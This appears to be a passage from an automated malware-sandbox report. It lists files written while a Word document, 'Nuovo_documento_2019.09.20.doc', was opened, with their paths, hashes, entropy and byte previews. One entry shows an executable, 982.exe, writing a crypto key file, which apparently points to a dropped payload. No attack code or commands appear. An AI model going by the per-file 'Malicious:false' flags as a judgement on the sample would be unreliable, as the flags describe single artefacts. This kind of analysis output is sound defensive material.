                Encrypted:false
                MD5:3934D3DBA41B871D94194A81F9770D15
                SHA1:75BD83B5C542B4510C871D788867335FF9E7F61C
                SHA-256:F2394A106AA6D4ACC3A297DCFDC9958355E3C824450878DA358E0E407E427F9F
                SHA-512:DF33971396B7FEAB54DB8AE33E01DFC82357A591263ED0429687117F59CDD677888C37752C91EF64AB47D3003CD15B3BC2C1026548D0ABF0497D58639B378D85
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n.........&.'.-v@.0v9.f.....-.................'...........................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\627D15E1.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.265073788282792
                Encrypted:false
                MD5:112C151F42DD66B8A46F37F347E857A7
                SHA1:DEEAE8A48A77538A8017FC290216D49A1A5BA691
                SHA-256:52927CD91023D2087AD4948D329A610141299FD4C7ADD640B20B7768BCBE5D55
                SHA-512:8BB2817888D787949E78A6D0999EDAE258881CD7F2DB7769133FA051D37A9D48A157212F0B3878B8D4A478FB53E5440832750C20E8D71013B9595AE0164FA890
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A.......m#..I.u@..u..f.....-.................'.........
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6BD64A8B.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.2970430492936575
                Encrypted:false
                MD5:051ADBA813F643CAE64B8FF6469A7D56
                SHA1:C353030EFCF4E0B19D793600D800F9477F69C4DE
                SHA-256:97E79F0722FB906EDDF8DACA1EACA4C0BF9775E998327404D90EE694AAE0D17A
                SHA-512:B50CBE27B002A21E4DFB69C02EA195C969531652B860038D632622C354A0689D7930298946A7ABBA0A76EB165FB255B7E401500FD41D6145C623DCE4DB2917F6
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A...`6...m#..I.u@..u..f.....-.................'.........
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7806EFD5.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.288034040284648
                Encrypted:false
                MD5:DB9047F2F57348CB9907BC18F0B7C38C
                SHA1:2E91277450E3B32CDEE0E9E3F62A83E942AC2B33
                SHA-256:8C64939224DF6801A92FD5B8272F31CFFBDB765795C6461951BCD0CA63483A1C
                SHA-512:AFD8C0F4FE96E74F1CB38E59C950CE191C0033D70B413AD3824041D0448C5DE45A4C766404A4757B35AFEC967EF03A8744D9CACEBB0797A80E71F9FC214221DD
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A.......m#..I.u@..u..fM....-.................'.........
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7CB5B986.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.190530479005839
                Encrypted:false
                MD5:8420A766419DA43853FE79DCCFC9740B
                SHA1:099D841F94B6F38F52720E6C1E84A6A3735AED96
                SHA-256:B9D8BD38B39487C173786E908F5CAB10FE2C81DC6E6E91F98CB1EBD13BA943C6
                SHA-512:93359F16A4FB5842F339DB423A221D11B6854CE99DD4F1361AF2DDE9BFFD5B5A5EBA7473B2C667E3BF9E7C2BDE20745B1433BF86D61571296B4AEF42C3C98B8D
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n.........&.'.-v@.0v>.f.....-.................'...........................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F762AB8.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.184567519044446
                Encrypted:false
                MD5:F9E083929EB80449F05AADAD41E946AF
                SHA1:AC9252071CD9A4DF1972E6181D04EE2AB206D2B0
                SHA-256:C64132607E8E7FEF05CA767EEE8F14542F5444F4F66C4CB0DD21FA7941C3908E
                SHA-512:B7D5AA6A6F4CF43836EC7473F04B43FF2C3BFB08D94B79D50CE0145DD9D674055F4AC6DD0ACCAF1EC0F814E11047CBD8B5E75783181572414B441CE8A4FC19C4
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n...@.....&.'.-v@.0v<.f.....-.................'...........................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\887ADA1B.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.282583782676525
                Encrypted:false
                MD5:79007329A911130DC005DC316CC736F9
                SHA1:88453679F805B23150F0EE1750D45B34473F7AB4
                SHA-256:FF0E5C38AC42132F6F43A81434EDA10D88467ECBF832D9DC882441E9BDBA33CD
                SHA-512:1270E93AA7330F0A4C80385B98DCC2DF7624535272FD7E15547E2662C019E7B55E0391DAE35B17B2C38A73917760967687E4324398C0CBF4DA292B771978EEC9
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A.......m#..I.u@..u..f.....-.................'.........
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8FF0CB08.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.1928688241605054
                Encrypted:false
                MD5:6CF15EF7593B3BE31ABEB605865B7545
                SHA1:C27DE85EA247CA69EC7834581E677260CE6CAFBA
                SHA-256:91F230E1B45F6CDA65EEF13B9266842C564EF0BE40C468BCC9E61FAC74E73A70
                SHA-512:92986B9BBE796BA0F98301FEEE9FFC12ADE08E80E89374E91CCC67E329A2CA08E657811A69115983D4B25A8A1622603337D4C21F455817DE9002C85CD8C8F770
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n...@.....&.'.-v@.0v#.f ....-.................'...........................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BEDDBFC.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.1759695423295566
                Encrypted:false
                MD5:84CB031A68B621ED84D8217A19EB8B31
                SHA1:391310274033A04F1490E0B2E804C59B98D59927
                SHA-256:ED6C187ABDA95ABC7DC7A92D827ABB5D69BB3D9654B0E6F8A00F9448ED877A2E
                SHA-512:4D56D1D61EE712E1515C1E4A6ED94864155741B7AD24108DC8A8E21875BB7543A9C6E7842E32779B4098CA338C32F66DEF05582F7EA09A21BD69C1BBD080A6DB
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n.........&.'.-v@.0v`.f.....-.................'...........................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A1A3FD3E.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.1901737754638897
                Encrypted:false
                MD5:2C7909FA4FBD0D988F5AAC92795E4142
                SHA1:D533B95896BFE834E6BBB50695B7C94A009BE583
                SHA-256:9B281E54D5A553777F545BCDCA198A89FE119115AAA05428121E793B7FB2A22E
                SHA-512:6EFBEA57BAF2196D019C1BD46B26674900CE598F8F4B9CDC30B232C53E5D1931A8C7D08DD60CF33C251C339270BEF6C2FD34F67D7253017FFCE61DFE920A14C6
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n...HH....&.'.-v@.0v .f ....-.................'...........................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A3AE3E5F.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.292538544789153
                Encrypted:false
                MD5:25FB55E776C272194B1527A141A79C25
                SHA1:CDCCE4AE12506FBB6617A16ADE43796D1A9F9152
                SHA-256:C5C8D7ADD9ED6F3535CF4E8096CACEA6E23C073FFFBED04246D56F15AA86E8F8
                SHA-512:6D299069989CB000992F7FA09C457EB3413063420DFBF2575F3B3C0A725B3399F2E36CCE155DF9ECB3ACA79F4B2344E42B3C5AD28D320BE9C1E79786E3B035BF
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A.......m#..I.u@..u..f.....-.................'.........
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6BDC6D3.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.292538544789153
                Encrypted:false
                MD5:FD9D5258FC01B92B85F5F66BDE0C716E
                SHA1:7E94E86FAA295CF3C1A6E0D0B1C81F237567C058
                SHA-256:FCC097EB3BD4F8175B7A1F5F6D41995486EC625A68C9EAD7A7D38183FC4D0224
                SHA-512:979D75314B11194456556331F3646ACC21F647C1EC29EC485E8CF9559607DE61263DE032F814EA7A75D5BECC0D20815DEA304BE706F2CC3C67C2863B7B7F9113
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A...P....m#..I.u@..u..f.....-.................'.........
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AE8B38BD.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.280783407516915
                Encrypted:false
                MD5:F6FA31796FED0A0DC93FE6C39F1F7175
                SHA1:85478D0124CE4181A40298BA9F60D6E952849421
                SHA-256:1AF18D6158D16A0FA06AFDA1EB5ECEBAC9B8B72BF881CF323A573C28BEED9D8A
                SHA-512:501BBAD27C74E02FD3091AD1CF7B9D95EF513F9443A29564238B70977A69810EB5E2641735250993460351B49E17DAF02512F817EDAA58A6A8810CF80B097F0D
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A...p....m#..I.u@..u..f+....-.................'.........
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0C64E56.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.200681898780499
                Encrypted:false
                MD5:5CA7ED787FBF985F8332CA352925D1A4
                SHA1:1D80F7875FC737E650C47D1DB90B0EE0DCA72740
                SHA-256:81F293698612C3F38EE5EAA278FF29B3E8D180DCF3EE343F13CF66C823EDA192
                SHA-512:2FCF5E5769C436FA6E1B463373F0313A4CC232DFB3F972B64AF9C8C0B86472EE49342AC8FEDD6430324E37F9827A9BE345FB64868E163E7CB3B485CFD90F2EBB
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n.........&.'.-v@.0vU.f"....-.................'...........................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9FD7B59.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.288034040284648
                Encrypted:false
                MD5:0C6DB51E8E2E3C8B995A7E6736EC94ED
                SHA1:CF03B45CFCDAC281FA3C060B3DFFB12BB238CE0D
                SHA-256:653148B5E747C1BC657A0804EC8F05C0A521B3915881C36877C09EEBFE303FB6
                SHA-512:9DBB5DDF72ABEF17577DD02385D70B40E8071E8CB1D7A4A5710DCE78D2B9CF7C4DA8C4CCE241F82BE78776A8E449705E82AE4DE17CEE82D117D50F45C1BC162D
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A....<...m#..I.u@..u..fP....-.................'.........
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA46CC32.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.186201474676835
                Encrypted:false
                MD5:CD01AEBC62607A15B77B5894B635319D
                SHA1:FCE721C300F30BC6FECB36363DE9204D7C1745E6
                SHA-256:E79B6B20A5206ABA5FD06DD7E435C2107628606262B1EC21772BEEB217246D72
                SHA-512:23C2FE5832926623EF65AAE2B695B360727E39704F2818A96BA8149538EE0B66FE851FD31A1A5A9CF5C6AC8CA3B129CA7EDF7457C02DEDB0C9E5437CAF5599B7
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n........&.'.-v@.0vB.f.....-.................'...........................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3FA04D4.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.190530479005839
                Encrypted:false
                MD5:C0FE8A0070477766DF6C13946AC61B86
                SHA1:F74EF43E3FC2C185D43F9407BF13F8A793E045A0
                SHA-256:452E1F86F94FC7EEFF5936078DC3834BB14398CA415DC459CE87D79A9A2FA26B
                SHA-512:C1446CB37CA3E34F30F6FD2A940E3127B27CD67E89A2090BAC70D2CAB6783C6C1D109BBDA35F9A6CE197F853AC100BE3A681636BFE430B1976C0DF79EE31E288
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n.........&.'.-v@.0v5.f.....-.................'...........................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA52B6C5.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.2970430492936575
                Encrypted:false
                MD5:B059BE68FCD725D1BFD6900E89788BF0
                SHA1:E0168057480CF002E64708A88057E0AD2B08ED88
                SHA-256:ECC34300BA1403725C5696E2752464B3E3EA8C6A9CEFDEB389FDE10773016009
                SHA-512:712E2236F404008596FD4C0A57917BA029B6864E73F258972DA0ED498CC1F426FF6F7E5FA5FE0D8535A3A1F2650DE9EC8861B6D96FCCF0C274D65BDEA829F576
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A...p....m#..I.u@..u..f.....-.................'.........
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB3BCFCF.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.2897342373615936
                Encrypted:false
                MD5:4673D1968085F58970A07BDE8D011481
                SHA1:9C7688F8B3F608E1E5DC16D4626123296A2A7E85
                SHA-256:4F3B3C921E93243D367174E450CBA6DC0C3A886997FC131DDECF7492F7D20D8F
                SHA-512:036CEA29EF05AC5014D586D101E2BE83B536B3B16F196DA8722E385844C564A7305D5088C2331C6CF75BC57A97FE6E20131555F38E0C12FA45180F00CDAD845C
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A... ;...m#..I.u@..u..f.....-.................'.........
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD9ED7F1.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.288034040284648
                Encrypted:false
                MD5:1FC651314C344FFF2D2AD7595369214E
                SHA1:2EF4A99A71AA67C1ED7D80E1D876BFCBF57D93A0
                SHA-256:AC4FB89FD0183ACA0F6D727B2FAEF810F20F1ECC6CA89E3DBEBC0EA8471E59F6
                SHA-512:15F9B3CDF98B5AF36299AAB31170A5D0459DA89C4E5D83011B2D2162690FA28A09D0F55770ABDEAFA88B355AC657D5ED5528093E02FD4EBF7BE6F7A23200AB6C
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A.......m#..I.u@..u..f)....-.................'.........
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E0222F9A.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.183506425980218
                Encrypted:false
                MD5:2EA0D3B2666E5952B7C46876B5F1660B
                SHA1:00D95C3A0F903FE8F5BFEB06590C695AF4802759
                SHA-256:E854B3883D488B96384983B0A04231973A40FEE94875623280899339DE39C613
                SHA-512:9AAEBFBBC278B36A04137F84855443622872EAABAB1B10579F3D14FB277391C8E54C786C0A32EE79BDBCEDDFB4B24D4B2AEDB663509B31EB9EDC3A6943E1478B
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n.........&.'.-v@.0v;.f.....-.................'...........................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E442C602.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.200681898780499
                Encrypted:false
                MD5:AD419B96AB066E06EAC036B6065287A7
                SHA1:4E67301D21534C03A75B00FC0222AC6EFAD05EF8
                SHA-256:5610C333CCCF85ABFC3F4930C62FB0252F98A828B167E8A7120471AA25F059EB
                SHA-512:1F55163298D6E49D3CEA6A884FB91129B6AD05175ED08D2C138CD3148EE9117FB03A9B51308C8AB65566A8D234F8F1C13EC65C21863FB0C0447E2C1E0446ADD4
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n... .....&.'.-v@.0v~.f.....-.................'...........................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F1476E24.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.1958963691236155
                Encrypted:false
                MD5:66CAEB9BBC8EFDF4A9D4607D5BC82258
                SHA1:E0E761A19FAD9109CEC4A165C1839574959EAF95
                SHA-256:3C813E5385B439B7B9869B62EE117E19300FF92FDA5EED964D02487FAD9B5030
                SHA-512:91D82462DEAD4464F0EC6C6BF4F3A9F1767FEDC9822097D4F3D08D80DB3A176D8DCE4466C20DBF2835C872D9D28EFCDFBD018358898EECA5BCE6F0FDBDCE6540
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n...hF....&.'.-v@.0v`.f.....-.................'...........................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8C1B397.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.2787120459436183
                Encrypted:false
                MD5:EA2FA46444CB04DE0026E45F39C647E3
                SHA1:44B29CC391B0B6957093EA1989C093C05906D4AC
                SHA-256:B69B4F5228A0B7932BB3D017768B92429FE318DB5E8EDAD3D26FBC30CB7FA9F7
                SHA-512:AF133041821E4EBAA8C8BF15598A6F2423EE57AE36BB35C1A1E724C399BAE37367F70E4D4FA74D08B8CEEE764DC41D4CAF82316C430CD6F60E4313FDC3F7B2E5
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A.......m#..I.u@..u..f.....-.................'.........
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA0AC26E.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.190530479005839
                Encrypted:false
                MD5:0D7996DF9763147D45FA25D78E8E35F5
                SHA1:B51F70E30C5C74CC08629EB2F375C15BBA3C2251
                SHA-256:7400B04CFD802B7DECC0F3B941EF2CAF592BD81376097F5256141C1A67ED9320
                SHA-512:F536F325CF80DE53209799C8DBF65E61B1B3AC5341D43920ABA6F0D3F59B1FF5975ADEEF8262E6FC613AC3EA80D5D219629481A83CD38EEA87F7EC0DD4989036
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n...`.....&.'.-v@.0v7.f.....-.................'...........................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B2D8E064-4C82-489B-9E64-A1B1ADE949CA}.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):1024
                Entropy (8bit):0.05390218305374581
                Encrypted:false
                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                Malicious:false
                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Temp\Word8.0\MSForms.exd
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):182128
                Entropy (8bit):4.340855849014704
                Encrypted:false
                MD5:536E0FF11E2CC49AF44BA87257D8CDCE
                SHA1:02DD0947598FA9EEBDCAF5617351610435B33DD0
                SHA-256:2EAF515FC7AF0A73EAB80C57D880E0028B4AC187AAA290A70457532A5DF60940
                SHA-512:C03ED0323B19EBF5DA2E49042AFA971BCB927D52FBF878FD7523E037EC5B8A9455C97F0EB9A9E42169B513ED75D4F5415FFE658DB76924679318A974E514A38C
                Malicious:false
                Preview:MSFT................Q...............................=#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......l...8..........................$................................................................................x...G..............T........................................... ...........................................................&!...........................................................................................N.
                C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312302014-279660585-3511680526-1004\4aacbf725e5908a192ccd61db75414d6_041d84af-7e76-450d-8340-55db3c73c359
                Process:C:\Users\user\982.exe
                File Type:data
                Size (bytes):2102
                Entropy (8bit):7.176598689928795
                Encrypted:false
                MD5:D098E1BFB9EA7F29AD8CFB93ED6D90A8
                SHA1:C893189C0A0540BE6E105675E679FEE8ECCB2F05
                SHA-256:087A78E04865A9A90EFFD6033E50FFA19B3566596C40C99962A3738C8CD9BA1D
                SHA-512:6815B12F41688AF8D728A8C4B7B65EEF9A252C0368B988E86F3F05C483956DB944ECA2F45C978EA851E4388843AB3AACC087F846625F0C20C2524070DEF56463
                Malicious:false
                Preview:....................\...................user.RSA1H.......?...........}...h8...B~k..!.R..<.HN:D...tW....5g.n.xLu5..tI. .q5e.. ........................z..O.......3q....M.q..m{\.....,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... ............C..M.Pl....b..E................... ......K..U.B...C1"..o............y......."....Io..,...e.+..x../.i..3t}/.D_.p.8R....2...k.#..?.;Dql5...'O.{..N*64\^.....s;Z&.8/<oY4T...1....mw.-.._.3.F)...7.....u.4..}...&.L.x...|.&..@.].(.=c*.6.&x.b.b&l....{..U..r..h.t.V|K..K......t.[.#...qm7...qC.&._.o...v......w6H.*.X56...*A"D...L+._U[......r...XO7......"4.Ja.cz.4..>....99.W|...._..Jr~Z..-"ZKX.:..wo..UU....7...b.c.T.GFM..J.=.....[.&|.s..H..g\..n..3....VO'.O......WX@....#....R.R....>....{.. .H.....0?...rw...o..?h......8.ye..@p..............z..O.......3q....M.q..m{\.........E.x.p.o.r.t. .F.l.a.g....f...... ...T....=oZ!.-...|...D...).1.S............. ....{..9..%j..Q]...x.H...}..y/j......N..%......f....@...4..Jy.^.Gt...
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Nuovo_documento_2019.09.20.LNK
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 12 10:48:02 2019, mtime=Mon Aug 12 10:48:02 2019, atime=Fri Sep 20 10:29:23 2019, length=238592, window=hide
                Size (bytes):2226
                Entropy (8bit):4.551273023282595
                Encrypted:false
                MD5:234F18866F9CA3536B02E3109C2D58F5
                SHA1:02074004BA25998464F686E980C0C1BCE2A95B03
                SHA-256:6A9AB04EFF4826C43B411A37360511FF4E35CB221A72CE7A77A7227A769B620D
                SHA-512:137515DC683B65C8618C1E4BE15B5A9CC7E10EBC10989EDE5C894B9A94FC895F78CAB6A1C83AD22438A121C700E128B39B213D0AC5CE1211196D2A93066EA030
                Malicious:false
                Preview:L..................F.... ...j....Q..j....Q...4E..o...............................P.O. .:i.....+00.../C:\...................t.1......H.>..Users.`.......:...H.>*...Z...............6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1......O.^..user~1..B.......H.9.O.^*.........................l.u.k.e.t.a.y.l.o.r.....z.1......O.^..Desktop.d.......H.9.O.^*...&...............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....4O.[ .NUOVO_~1.DOC..j.......O.^.O.^*....(....................N.u.o.v.o._.d.o.c.u.m.e.n.t.o._.2.0.1.9...0.9...2.0...d.o.c.......................-...8...[.............h.....C:\Users\..#...................\\813848\Users.user\Desktop\Nuovo_documento_2019.09.20.doc.5.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.u.o.v.o._.d.o.c.u.m.e.n.t.o._.2.0.1.9...0.9...2.0...d.o.c.........:..,.LB.)...Au...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.3.1.2.3.0.2.0.1.4.-.2.7.9.6.6.0.5.8.5.-.3.5.1.1.6.8.0.5.2.6.-.1.0.0.4
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:ASCII text, with CRLF line terminators
                Size (bytes):86
                Entropy (8bit):4.493255092405266
                Encrypted:false
                MD5:5E61C5A9137DC37593811391C419A91D
                SHA1:AEECD1E614F40C39C2B7BDCFB26E9214629BA26D
                SHA-256:14217EBAA31435E304D13CB8F27B28A5AD426876B3CA7AE21B9BD4DAA6CC8F31
